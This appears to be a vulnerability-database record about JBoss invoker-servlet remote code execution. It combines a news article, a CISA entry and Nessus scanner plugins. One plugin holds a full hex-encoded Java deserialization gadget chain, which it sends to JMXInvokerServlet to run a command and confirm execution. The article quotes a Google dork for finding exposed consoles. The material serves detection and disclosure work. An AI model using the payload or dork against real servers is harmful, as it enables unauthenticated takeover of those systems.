"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2013-10-23T00:00:00", "id": "SAINT:C4CE6EE786263B63DE8534C3A7C9A1ED", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_web_reporter_jboss_ejbinvokerservlet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2017-01-08T18:01:12", "description": "[![](http://2.bp.blogspot.com/-xGy919BMJkM/Uo4h1tgpTyI/AAAAAAAAY5U/Kd9_6rKnQHw/s728/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png)](<http://2.bp.blogspot.com/-xGy919BMJkM/Uo4h1tgpTyI/AAAAAAAAY5U/Kd9_6rKnQHw/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png>)\n\n[Cyber security](<http://thehackernews.com/search/label/cyber%20security>) of many organizations being attacked at an extremely high rate this month, well another alarming cyber crime report become public today.\n\n \n\n\nA widely unpatched and two years old critical [vulnerability](<http://thehackernews.com/search/label/Vulnerability>) in JBoss Application Server (AS) that enable an attacker to remotely get a shell on a vulnerable web server.\n\nJBoss Application Server is an open-source Java EE-based application server very popular, it was designed by JBoss, now a division of Red Hat. In late 2012, JBoss AS was named as \"_wildFly_\", since disclosure of the [exploit code](<http://thehackernews.com/search/label/exploit>) many products running the affected JBoss Application Server have been impacted, including some security software.\n\n \n\n\nTens of thousands of enterprise data center servers are vulnerable to this attack, with at least 500 actively compromised, according to the Imperva report. Many systems administrators have yet to properly configure their servers to mitigate the threat, and the number of potential targets has increased over time, making the exploit even more attractive to attackers.\n\n \n\n\nThe number of infections has surged since exploit code called **_pwn.jsp_** was publicly disclosed i.e. October 4th.** pwn.jsp** shell isn't the unique exploit available, Imperva\u2019s Barry Shteiman confirmed the availability of another more sophisticated shell available to attackers. \n\n> \u201c_In these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities_,\u201d\n\nA number of Government and Education related websites have been hacked, exploiting the JBoss Application Server vulnerability, where an attacker can obtain a remote shell access on the target system to inject code into a website hosted on the server or steal files stored on the machine.\n\n> \"_The vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server. Once the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that Application Server._\"\n\nImperva researchers demonstrated that JBoss AS is vulnerable to _[remote command execution](<http://thehackernews.com/search/label/remote%20code%20execution>) _via the \u2018_HTTP Invoker_\u2019 service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB).\n\n \n\n\nThe Invoker improperly exposes the management interface, \"_Jboss Application Server is vulnerable to remote command execution via the \u2018HTTP Invoker\u2019 service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB)_\".\n\n \n\n\nOn Sept. 16th, the National Vulnerability Database issued an advisory warning of a critical remote code execution bug affecting HP ProCurve Manager, it's assigned to the flaw the Common Vulnerability Enumeration code **_[CVE-2013-4810](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810>)_** and on October 4th 2013, a security researcher has disclosed the code of an exploit for the JBoss Application Server vulnerability.\n\n \n\n\nAs consequence the security community had witnessed a surge in Jboss AS hacking, the malicious traffic originated from the compromised servers was detected by Imperva\u2019s honey pots.\n\n \n\n\nIn a few weeks an exploit was added to _[exploit-db](<http://www.exploit-db.com/exploits/28713/>)_ that successfully gained shell against a product running **JBoss 4.0.5**.\n\n \n\n\nImperva confirmed that the number of web servers running Jboss Application Server exposing management interfaces has tripled since the initial vulnerability research was public disclosed passing from 7,000 to 23,000.\n\n \n\n\nI have just run the following Google Dork retrieving more than 17000 results:\n\n> _intitle:\u201dJBoss Management Console \u2013 Server Information\u201d \u201capplication server\u201d inurl:\u201dweb-console\u201d OR inurl:\u201djmx-console\u201d_\n\n[![](http://3.bp.blogspot.com/-73eMvUVgFOQ/Uo4gzZ5AMKI/AAAAAAAAY5M/tubiO2mjQ1U/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png)](<http://3.bp.blogspot.com/-73eMvUVgFOQ/Uo4gzZ5AMKI/AAAAAAAAY5M/tubiO2mjQ1U/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png>)\n\nIt is possible to note that Google reconnaissance enables the attacker to identify also governmental and educational websites, some of them also result infected. \n\n> \"_Many of the deployed web shells utilize the original pwn.jsp shell code that was presented with the original exploit, as can be seen in a [blog entry](<http://nickhumphreyit.blogspot.co.il/2013/10/jboss-42-hacked-by-pwnjsp.html>) posted by one of the attack\u2019s victims. In other cases a more powerful web shell was deployed. In these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities._\"\n\nThe concerning aspect of the story is that once again on a two-year-old vulnerability could be easily exploited to compromise a huge quantity of information, the situation is analogue to the [Silverlight](<http://securityaffairs.co/wordpress/19843/hacking/microsoft-silverlight-5-flaw.html>) flaw that manages users of Netflix, the provider of on-demand Internet streaming media.\n", "cvss3": {}, "published": "2013-11-21T04:13:00", "type": "thn", "title": "Two-year-old vulnerability in JBoss Application Servers enables Remote Shell for Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-11-21T15:16:59", "id": "THN:8573602ED2B18F90AC04D8BA8D25E682", "href": "http://thehackernews.com/2013/11/Vulnerability-JBoss-Application-Servers-exploit-code.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "HP ProCurve Manager (PCM), PCM+, Identity Driven Manager (IDM), and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet.", "cvss3": {}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "HP Multiple Products Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2013-4810", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-09-19T15:43:46", "description": "The remote JBoss server is affected by multiple remote code execution vulnerabilities :\n\n - A flaw exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. A remote attacker can exploit this issue to bypass authentication and invoke MBean methods, allowing arbitrary code to be executed in the context of the user running the server.\n (CVE-2012-0874)\n\n - The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host.\n (CVE-2015-7501)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-10T00:00:00", "type": "nessus", "title": "JBoss Java Object Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0874", "CVE-2015-7501"], "modified": "2019-11-22T00:00:00", "cpe": ["cpe:/a:redhat:jboss_a-mq", "cpe:/a:redhat:jboss_bpm_suite", "cpe:/a:redhat:jboss_data_virtualization", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:redhat:jboss_enterprise_brms_platform", "cpe:/a:redhat:jboss_enterprise_portal_platform", "cpe:/a:redhat:jboss_enterprise_soa_platform", "cpe:/a:redhat:jboss_enterprise_web_server", "cpe:/a:redhat:jboss_fuse", "cpe:/a:redhat:jboss_fuse_service_works", "cpe:/a:redhat:jboss_operations_network", "x-cpe:/a:redhat:jboss_data_grid"], "id": "JBOSS_JAVA_SERIALIZE.NASL", "href": "https://www.tenable.com/plugins/nessus/87312", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87312);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2012-0874\", \"CVE-2015-7501\");\n script_bugtraq_id(57552, 78215);\n script_xref(name:\"CERT\", value:\"576313\");\n script_xref(name:\"EDB-ID\", value:\"30211\");\n\n script_name(english:\"JBoss Java Object Deserialization RCE\");\n script_summary(english:\"Attempts to execute a command on the remote host via a crafted RMI request.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote JBoss server is affected by multiple remote code execution\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote JBoss server is affected by multiple remote code execution\nvulnerabilities :\n\n - A flaw exists due to the JMXInvokerHAServlet and\n EJBInvokerHAServlet invoker servlets not properly\n restricting access to profiles. A remote attacker can\n exploit this issue to bypass authentication and invoke\n MBean methods, allowing arbitrary code to be executed\n in the context of the user running the server.\n (CVE-2012-0874)\n\n - The remote host is affected by a remote code execution\n vulnerability due to unsafe deserialize calls of\n unauthenticated Java objects to the Apache Commons\n Collections (ACC) library. An unauthenticated, remote\n attacker can exploit this, by sending a crafted RMI\n request, to execute arbitrary code on the target host.\n (CVE-2015-7501)\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/solutions/2045023\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate interim fix according to the vendor advisory.\nAlternatively, ensure that all exposed ports used by the JBoss server\nare firewalled from any public networks.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_a-mq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_bpm_suite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_data_virtualization\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_brms_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_portal_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_soa_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_web_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_fuse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_fuse_service_works\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_operations_network\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:redhat:jboss_data_grid\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"string.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080, embedded:FALSE);\n\n# Check http banner for JBoss\nbanner = get_http_banner(port: port);\nif (\"JBoss\" >!< banner && \"Apache-Coyote\" >!< banner) audit(AUDIT_NOT_LISTEN,\"JBoss\",port);\n\n# Open connection to JBoss.\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL,\"JBoss\",port);\n\n#\n# setup unique id for pingback\n#\nid_tag = hexstr(rand_str(length:10));\n\n#\n# build request\n#\nrn = raw_string(0x0d, 0x0a);\nraddress = get_host_ip();\nladdress = compat::this_host();\n\ncmd = \"ping -c 10 -p \" + string(id_tag) + \" \" + laddress;\ncmdlen = strlen(cmd);\n\nserObj = hex2raw(s:\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\");\nserObj += raw_string(cmdlen) + cmd;\nserObj += hex2raw(s:\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\");\n\ncontentLen = strlen(serObj);\n\npostdata = \"POST /invoker/JMXInvokerServlet HTTP/1.1\" + rn +\n\"Host: \"+ raddress +\":\"+ string(port) + rn +\n\"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue\" + rn +\n\"Content-Length: \" + string(contentLen) + rn + rn +\nserObj;\n\n# See if we get a response from RMI payload\nfilter = \"icmp and icmp[0] = 8 and src host \" + raddress;\ns = send_capture(socket:soc, data:postdata, pcap_filter:filter);\ns = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(s) || id_tag >!< s) audit(AUDIT_LISTEN_NOT_VULN,\"JBoss\",port);\n\nreport = NULL;\n\nif (report_verbosity > 0)\n{\n report =\n '\\n' + 'Nessus was able to exploit a Java deserialization vulnerability using' +\n '\\n' + 'a crafted RMI request.' +\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port:port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:11:17", "description": "According to its self-reported version number, the version of Cisco Prime Data Center Network Manager (DCNM) installed on the remote host is affected by a remote code execution vulnerability. Unauthorized users have access to the JBoss Application Server Remote Method Invocation services. A remote, unauthenticated attacker could exploit this to execute arbitrary code as SYSTEM (on Windows) or root (on Linux).\n\nThis plugin determines if DCNM is vulnerable by checking the version number displayed in the web interface. The web interface is not available in older versions of DCNM.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-07-11T00:00:00", "type": "nessus", "title": "Cisco Prime Data Center Network Manager RMI Remote Code Execution (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1036", "CVE-2012-5417"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_6_1_2.NASL", "href": "https://www.tenable.com/plugins/nessus/67247", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67247);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-5417\");\n script_bugtraq_id(56348);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCtz44924\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCua31204\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20121031-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager RMI Remote Code Execution (uncredentialed check)\");\n script_summary(english:\"Checks DCNM version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nPrime Data Center Network Manager (DCNM) installed on the remote host\nis affected by a remote code execution vulnerability. Unauthorized\nusers have access to the JBoss Application Server Remote Method\nInvocation services. A remote, unauthenticated attacker could exploit\nthis to execute arbitrary code as SYSTEM (on Windows) or root (on\nLinux).\n\nThis plugin determines if DCNM is vulnerable by checking the version\nnumber displayed in the web interface. The web interface is not\navailable in older versions of DCNM.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121031-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ef95f6c\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 6.1(2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-667\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_prime_dcnm_web_detect.nasl\");\n script_require_keys(\"installed_sw/cisco_dcnm_web\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\napp_id = \"cisco_dcnm_web\";\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:app_id, port:port, exit_if_unknown_ver:TRUE);\n\nurl = build_url(qs:install['path'], port:port);\nver = install['version'];\n\nmatch = eregmatch(string:ver, pattern:\"^([0-9.]+)\$([^)]+)\$\");\nif (isnull(match)) exit(1, \"Failed to parse the version (\"+ver+\").\");\n\nmajor = match[1];\nbuild = match[2];\n\nif (\n ver_compare(ver:major, fix:'6.1', strict:FALSE) > 0 || # < 6.1.x\n (major == '6.1' && build !~ '^1([^0-9]|$)') # 6.1.x < 6.1(2)\n) audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : 6.1(2)\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:12:00", "description": "According to its self-reported version number, the version of Cisco Prime Data Center Network Manager (DCNM) installed on the remote host is affected by a remote code execution vulnerability. Unauthorized users have access to the JBoss Application Server Remote Method Invocation services. A remote, unauthenticated attacker could exploit this to execute arbitrary code as SYSTEM (on Windows) or root (on Linux).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-07-11T00:00:00", "type": "nessus", "title": "Cisco Prime Data Center Network Manager RMI Remote Code Execution (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1036", "CVE-2012-5417"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_6_1_2_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/67248", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67248);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-5417\");\n script_bugtraq_id(56348);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCtz44924\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCua31204\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20121031-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager RMI Remote Code Execution (credentialed check)\");\n script_summary(english:\"Checks DCNM version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nPrime Data Center Network Manager (DCNM) installed on the remote host\nis affected by a remote code execution vulnerability. Unauthorized\nusers have access to the JBoss Application Server Remote Method\nInvocation services. A remote, unauthenticated attacker could exploit\nthis to execute arbitrary code as SYSTEM (on Windows) or root (on\nLinux).\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121031-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ef95f6c\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 6.1(2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-667\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/20\"); \n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_prime_dcnm_installed_win.nasl\", \"cisco_prime_dcnm_installed_linux.nasl\");\n script_require_ports(\"installed_sw/Cisco Prime DCNM\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\n\nget_install_count(app_name:appname, exit_if_zero:TRUE);\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\ndisplay_ver = install['display_version'];\n\nfix = '6.1.2.0';\ndisplay_fix = '6.1(2)';\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, appname, display_ver);\n\n# Could be Windows or *nix\nport = get_kb_item('SMB/transport');\nif (!port) port = 0;\n\nif (report_verbosity > 0)\n{\n if (isnull(display_ver))\n display_ver = ver;\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + display_fix + '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:56:06", "description": "Updated JBoss Enterprise Application Platform 5.2.0 packages that fix multiple security issues, various bugs, and add several enhancements are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThis JBoss Enterprise Application Platform 5.2.0 release serves as a replacement for JBoss Enterprise Application Platform 5.1.2, and includes bug fixes and enhancements. Refer to the JBoss Enterprise Application Platform 5.2.0 Release Notes for information on the most significant of these changes. The Release Notes will be available shortly from https://access.redhat.com/knowledge/docs/\n\nAn attack technique against the W3C XML Encryption Standard when block ciphers were used in CBC mode could allow a remote attacker to conduct chosen-ciphertext attacks, leading to the recovery of the entire plain text of a particular cryptogram. (CVE-2011-1096)\n\nJBoss Web Services leaked side-channel data when distributing symmetric keys (for XML encryption), allowing a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2011-2487)\n\nSpring framework could possibly evaluate Expression Language (EL) expressions twice, allowing a remote attacker to execute arbitrary code in the context of the application server, or to obtain sensitive information from the server. Manual action is required to apply this fix. 